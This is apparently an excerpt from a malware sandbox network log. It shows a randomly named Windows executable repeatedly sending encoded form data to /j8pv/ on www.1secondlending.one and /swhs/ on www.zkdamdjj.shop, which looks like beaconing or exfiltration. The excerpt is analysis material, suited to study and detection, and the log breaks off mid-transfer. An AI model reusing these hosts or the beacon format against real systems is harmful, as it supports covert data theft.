Nov 24, 2024 08:31:24.822467089 CET	1236	IN	Data Raw: 65 41 74 74 72 69 62 75 74 69 6f 6e 27 3a 20 31 36 2c 27 61 74 74 72 69 62 75 74 69 6f 6e 42 6f 6c 64 27 3a 20 66 61 6c 73 65 2c 27 72 6f 6c 6c 6f 76 65 72 4c 69 6e 6b 42 6f 6c 64 27 3a 20 66 61 6c 73 65 2c 27 66 6f 6e 74 46 61 6d 69 6c 79 41 74 Data Ascii: eAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoa
Nov 24, 2024 08:31:24.822520018 CET	584	IN	Data Raw: 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 65 72 72 6f 72 63 6f 64 65 26 63 6f 64 65 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 29 20 2b 20 22 26 75 69 64 3d 22 Data Ascii: "&caf=1&toggle=errorcode&code=" + encodeURIComponent(status.error_code) + "&uid=" + encodeURIComponent(uniqueTrackingID));if ([18, 19].indexOf(parseInt(status.error_code)) != -1 && fallbackTriggered == false) {fallbackTriggered = true;if (typ
Nov 24, 2024 08:31:24.897108078 CET	1236	IN	Data Raw: 3d 68 74 6d 6c 26 64 72 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 70 61 67 65 4f 70 74 69 6f 6e 73 2e 64 6f 6d 61 69 6e 52 65 67 69 73 74 72 61 6e 74 29 29 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 6e 65 65 64 Data Ascii: =html&drid=" + encodeURIComponent(pageOptions.domainRegistrant));}}if (status.needsreview === true \|\| status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" +

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50021	43.205.198.29	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:30.559228897 CET	784	OUT	POST /j8pv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.1secondlending.one Origin: http://www.1secondlending.one Referer: http://www.1secondlending.one/j8pv/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4f 52 33 54 75 71 4b 32 67 39 58 30 37 6d 46 50 44 44 71 64 6b 57 31 64 50 6d 38 4c 75 36 36 2f 43 74 37 43 6c 54 35 2b 31 6b 6a 30 72 77 4e 68 50 52 63 2b 51 47 47 4c 36 32 57 50 44 52 62 43 4a 57 48 4d 70 4a 45 7a 31 41 70 2f 59 74 4d 43 52 59 4a 62 4f 51 7a 6f 66 66 57 61 37 78 30 57 42 31 71 45 6c 32 68 6d 55 66 4d 77 50 57 47 2b 33 79 66 39 32 2b 72 47 61 53 70 46 4a 66 35 71 44 71 70 4a 7a 50 50 4b 7a 38 62 6f 4b 51 51 33 77 38 66 66 73 38 33 6b 33 75 70 44 49 47 5a 32 53 52 6a 59 51 37 75 38 4a 74 4c 59 52 55 56 58 2b 68 4f 56 6c 4c 4a 4f 58 41 50 57 79 78 66 6f Data Ascii: ftMDw=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8ffs83k3upDIGZ2SRjYQ7u8JtLYRUVX+hOVlLJOXAPWyxfo
Nov 24, 2024 08:31:32.084897995 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:31 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50022	43.205.198.29	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:33.231410027 CET	808	OUT	POST /j8pv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.1secondlending.one Origin: http://www.1secondlending.one Referer: http://www.1secondlending.one/j8pv/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 65 2f 43 4a 33 43 6b 53 35 2b 35 45 6a 30 67 51 4e 6b 4c 52 63 31 51 48 37 2b 36 7a 57 50 44 52 2f 43 4a 55 66 4d 70 65 51 77 31 51 70 78 51 4e 4d 45 66 34 4a 62 4f 51 7a 6f 66 66 44 39 37 78 73 57 43 46 61 45 6d 55 4a 6c 58 66 4d 2f 4f 57 47 2b 6d 43 66 35 32 2b 71 72 61 51 64 72 4a 64 42 71 44 6f 78 4a 30 65 50 4a 36 38 61 6a 4f 51 52 70 33 2f 4f 7a 72 4e 65 6c 7a 75 67 6e 57 58 59 53 54 6e 2b 43 4d 49 75 66 62 39 72 61 52 57 4e 6c 2b 42 4f 2f 6e 4c 78 4f 46 58 44 78 39 46 36 4c 65 6f 51 79 48 46 68 55 75 75 4a 4c 77 56 4f 52 4f 39 5a 64 7a 67 3d 3d Data Ascii: ftMDw=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb9raRWNl+BO/nLxOFXDx9F6LeoQyHFhUuuJLwVORO9Zdzg==
Nov 24, 2024 08:31:34.743810892 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:34 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50023	43.205.198.29	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:35.953391075 CET	1821	OUT	POST /j8pv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.1secondlending.one Origin: http://www.1secondlending.one Referer: http://www.1secondlending.one/j8pv/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 57 2f 43 36 2f 43 6c 78 52 2b 34 45 6a 30 74 77 4e 6c 4c 52 63 53 51 47 54 36 36 7a 53 35 44 54 58 43 49 33 58 4d 38 62 73 77 6d 77 70 78 50 39 4d 46 52 59 4a 53 4f 55 66 30 66 66 54 39 37 78 73 57 43 48 43 45 77 32 68 6c 52 66 4d 77 50 57 47 49 33 79 66 56 32 2b 54 65 61 51 5a 56 4a 4d 68 71 43 49 68 4a 79 73 6e 4a 78 38 61 68 4a 51 52 68 33 2f 43 73 72 4e 53 44 7a 74 39 41 57 56 45 53 52 79 43 42 5a 34 71 49 4f 63 4c 58 51 48 6c 38 34 56 47 61 72 49 34 2f 56 6b 37 2f 37 6c 4b 2f 47 38 67 4e 47 47 46 56 75 73 78 6a 77 41 65 42 45 38 30 47 6d 37 41 72 51 42 31 59 69 6e 2f 2b 75 33 36 35 78 52 52 76 2b 66 56 35 2f 75 4c 33 67 63 5a 64 31 78 4c 49 4e 2f 4c 71 46 44 4c 67 42 4d 50 50 6e 4e 32 68 7a 48 75 6c 7a 31 41 43 4b 72 38 46 72 6d 69 78 66 76 64 6b 6d 67 67 50 2b 52 6b 62 50 6d 78 75 37 56 30 66 2f 75 6e 62 75 4c 42 44 33 65 77 35 30 45 41 30 35 48 51 37 [TRUNCATED] Data Ascii: ftMDw=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIW/C6/ClxR+4Ej0twNlLRcSQGT66zS5DTXCI3XM8bswmwpxP9MFRYJSOUf0ffT97xsWCHCEw2hlRfMwPWGI3yfV2+TeaQZVJMhqCIhJysnJx8ahJQRh3/CsrNSDzt9AWVESRyCBZ4qIOcLXQHl84VGarI4/Vk7/7lK/G8gNGGFVusxjwAeBE80Gm7ArQB1Yin/+u365xRRv+fV5/uL3gcZd1xLIN/LqFDLgBMPPnN2hzHulz1ACKr8FrmixfvdkmggP+RkbPmxu7V0f/unbuLBD3ew50EA05HQ7pekDdQ0zRRRF3Ojc4dCEJpSiAMITifkhZxDOgONkzOna62qO28jYRftDy9CxLMv1YpFjXHZf2eUIPlyiBti0tqUBR0toGZ1SWpvvZYSS4jB0vG9IHFlqeo744WnR6nzq8PPOSbsDH8cAeHUCGM1VaUf3uTsZT7x9hPbc8zrJQ8UYAxgk9XwgbUsHXf3YXbtnBoMDzo8JT1h5abd/RXPVNZRWci/Qy6zN1mUvjiUWPLtYgWzAKkfSXYLtSgv/F1ytvhSpH9sN+CGH9S2pLdK5HXtL4HHTmrCkQvMaLnuXK/CihgRJHAWW0exz0E7hZq8qPEk2/BeQ1PKGlTRMU3RNSlvGD5jEUI0zukipzZHFucOgCER/7d84Bo9fXal2Xc0RrcUPAcEIfXCl3WYe8479VoKD1tAw13+vdmT3fX5kl5vBUJsB28E7UfChhq2IXj2VGl2UO8XilvGQNCskY4z54nDPIqeKj+5QYet9BxRVrrzyRq/iac/xa0CkPTYfD23EURXzA1RvARAG65cEm7zVwEYx/bjRCKe5btWNWw/1bIkqpMRtkeY4h9xeYuIqnNRP+SGZwZGYA4234cROJlB9P98UBCek1UImX8jq2sGbxnUdmqiQ751lYtoE66XJ+oOjV6PaSIF3XKiaeqgrgFvaISZfR8E8HS97mt [TRUNCATED]
Nov 24, 2024 08:31:37.506993055 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:37 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50024	43.205.198.29	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:38.619323969 CET	521	OUT	GET /j8pv/?ftMDw=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b1DxYSdomJJ1cIHDMQoeegRhtBSr4yHNpY/YOIyeK233xsrfLHXE=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.1secondlending.one User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:31:40.133333921 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:39 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	50025	104.21.40.167	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:45.632940054 CET	769	OUT	POST /swhs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/swhs/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 37 78 49 2b 45 65 4b 55 64 49 43 74 4e 67 31 32 6d 61 62 6e 6a 41 66 6d 32 2f 75 75 2f 56 77 59 6b 43 44 53 70 68 37 52 2b 74 4a 51 48 36 72 6d 7a 49 6a 51 78 52 47 67 4b 6c 34 37 42 63 4c 4d 68 6e 55 4b 44 57 66 62 51 56 6f 6a 52 67 44 7a 59 50 6d 4c 62 30 6c 54 63 50 69 41 65 31 37 75 6d 59 6d 52 62 67 4f 6a 69 61 70 35 77 61 4c 4b 72 35 6b 50 68 4d 4d 35 70 69 39 7a 67 36 6c 6c 5a 34 77 36 67 34 44 2b 4e 55 56 70 77 68 67 50 49 53 59 35 38 66 6e 6b 69 73 70 31 33 71 49 48 59 56 45 45 77 64 56 74 36 74 48 33 69 63 38 48 76 54 53 33 6c 44 65 43 51 36 54 49 53 78 4f 4f Data Ascii: ftMDw=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY58fnkisp13qIHYVEEwdVt6tH3ic8HvTS3lDeCQ6TISxOO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50026	104.21.40.167	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:48.302864075 CET	793	OUT	POST /swhs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/swhs/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 47 59 59 71 41 72 53 6f 67 37 52 35 74 4a 51 54 71 72 6a 38 6f 6a 48 78 52 36 43 4b 68 34 37 42 63 50 4d 68 69 51 4b 43 68 6a 59 66 6c 6f 39 64 41 44 78 47 2f 6d 4c 62 30 6c 54 63 50 33 74 65 30 54 75 6d 70 57 52 5a 42 4f 69 72 36 70 34 7a 61 4c 4b 76 35 6b 4c 68 4d 4d 48 70 6a 52 5a 67 2f 68 6c 5a 38 30 36 75 4a 44 35 59 45 56 77 6f 42 68 37 41 51 77 39 6b 63 4f 58 69 65 31 77 72 4c 35 6a 55 44 5a 65 73 75 56 4f 6f 39 6e 31 69 65 6b 31 76 7a 53 64 6e 44 6d 43 43 74 66 76 64 46 72 74 52 58 38 45 4e 76 45 51 77 7a 33 56 41 36 77 44 73 55 71 79 44 51 3d 3d Data Ascii: ftMDw=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo9n1iek1vzSdnDmCCtfvdFrtRX8ENvEQwz3VA6wDsUqyDQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50027	104.21.40.167	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:50.972776890 CET	1806	OUT	POST /swhs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/swhs/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 41 41 59 71 78 4c 53 70 44 44 52 34 74 4a 51 4d 61 72 69 38 6f 6a 61 78 52 53 47 4b 68 39 4d 42 65 48 4d 68 41 59 4b 4c 31 33 59 49 31 6f 39 56 67 44 79 59 50 6e 52 62 30 56 58 63 50 6e 74 65 30 54 75 6d 71 4f 52 64 51 4f 69 74 36 70 35 77 61 4c 47 72 35 6b 76 68 4e 6c 38 70 6a 56 6a 67 4d 5a 6c 63 73 6b 36 69 62 72 35 46 30 56 79 72 42 68 6a 41 51 74 6a 6b 64 6a 6b 69 66 42 57 72 49 6c 6a 51 6e 41 65 75 64 70 75 71 76 48 4c 35 63 41 35 33 7a 57 36 6c 6c 76 36 47 62 54 4a 63 6e 76 68 56 33 4d 76 5a 66 35 38 79 7a 48 46 43 39 52 55 6f 6b 48 70 51 77 65 50 6e 32 51 4e 4f 75 54 49 79 69 67 50 69 65 72 63 44 52 47 76 31 49 38 59 34 57 5a 6b 49 74 2b 41 68 77 53 61 53 6e 6f 65 4a 6b 77 48 65 67 73 4d 4a 4a 46 78 6f 72 45 45 64 50 33 47 46 75 67 5a 4b 43 4f 6f 72 59 7a 6c 4b 66 67 35 32 75 57 39 70 46 67 31 6c 65 68 64 38 37 50 6d 31 75 6c 75 32 71 32 6a 55 2f 31 74 [TRUNCATED] Data Ascii: 